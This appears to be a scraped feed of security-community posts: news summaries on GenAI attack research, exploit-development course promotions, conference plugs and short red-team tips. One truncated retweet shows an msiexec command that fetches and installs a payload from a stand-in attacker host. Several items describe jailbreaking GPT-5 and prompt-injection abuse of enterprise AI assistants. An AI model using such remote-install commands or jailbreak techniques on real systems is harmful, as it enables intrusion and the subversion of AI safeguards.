Last week's tidbits:. Red Teams Jailbreak GPT-5 With Ease, Warn It’s ‘Nearly Unusable’ for Enterprise.Research suggests GPT-5 is more easily exploited than earlier models, such as 4o. These attacks highlight the importance of testing LLM implementations in organizations.

RT @Steph3nSims: Novel HTTP/1 Request Smuggling/Desync Attacks with James Kettle

Generate videos in just a few seconds. Try Grok Imagine, free for a limited time.

AI is already accelerating penetration testing. In a verified benchmark, an AI platform matched a veteran’s success rate in about half an hour while the human needed forty hours. The deep dive explains where that speed helps in practice, including triaging scan output, suggesting.

Last week's tidbits:.Zenity GenAI Attack Matrix Unveiled at BlackHat 2025: Security firm showcased exploits abusing enterprise AI assistants for data theft and manipulation, akin to SQL injection but in natural language. CrowdStrike Report Reveals 136%.

RT @ACEResponder: Windows lateral movement quick reference. #ThreatHunting #DFIR

RT @bojanz: Ooh finally a new diary. This time about why attackers wanted to steal Machine Keys in #SharePoint attacks 2 weeks ago. Read al….

Last week's tidbits:.HN Security Shares PoCs for Real-World GenAI Vulnerabilities: Post outlines exploits like prompt injections and unauthorized access in corporate LLM apps, emphasizing risks when AIs interface with databases or tools. Internal Phishing.

In 2025, zero-trust architectures (ZTAs) are revolutionizing network defense, but they're not impenetrable. My latest blog dives into advanced pentesting strategies, drawing from recent breaches like the ToolShell chain in Microsoft SharePoint (CVEs 2025-49704, -49706, -53770,.

Last week's tidbits:. OWASP Announces Webinar on GenAI Security Risks: OWASP scheduled a July 31 webinar to explore risks like prompt injections and model misuse in Generative AI, offering strategies for building and governing secure systems. Have you.

RT @Steph3nSims: The heavily updated version of the Advanced Exploit Dev course "SEC760" with my coauthor @0xabe_io was just recorded and a….

RT @0xfluxsec: Introducing: Hells Hollow - Thought rootkit SSDT hooking was dead? Following my previous work, I have managed to essentially….

RT @McGrewSecurity: I've updated my site with my scheduled @defcon 33 content: talk, workshops, @WSIIAOfficial, and a @RayRedacted joint. W….

RT @T3chFalcon: Most people think .msi files are just installers. But red teamers know better. msiexec.exe /i http://evil[.]com/payload[.….

RT @flakpaket: The man who humbly asks, "Am I right?" and then proceeds to test and prove his position by earnest thought and the love of T….

RT @Steph3nSims: Join me this Friday at 11AM PT on the @offby1security stream with the team from @dreadnode for a session on "Building and….

Last week's tidbits:. SentinelOne Releases 2025 Cloud Security Risk Report: The report outlines persistent threats like misconfigurations and credential compromises in cloud environments, alongside emerging AI-related risks. CERT-UA uncovered APT28 using.

RT @Steph3nSims: Exploiting a Windows Application Using Return Oriented Programming

RT @Steph3nSims: Join me this Friday at 11AM PT on the @offby1security stream with the good folks from @dreadnode for a session on offensiv….

RT @inversecos: Red teamers, no need to “pull” clipboard data when Windows already saves it all on disk for you in a neat little file 🗿. (i….

RT @Steph3nSims: I will be streaming a portion of the SANS SEC660 course I'm teaching today in DC on Introduction to Windows Exploit Develo….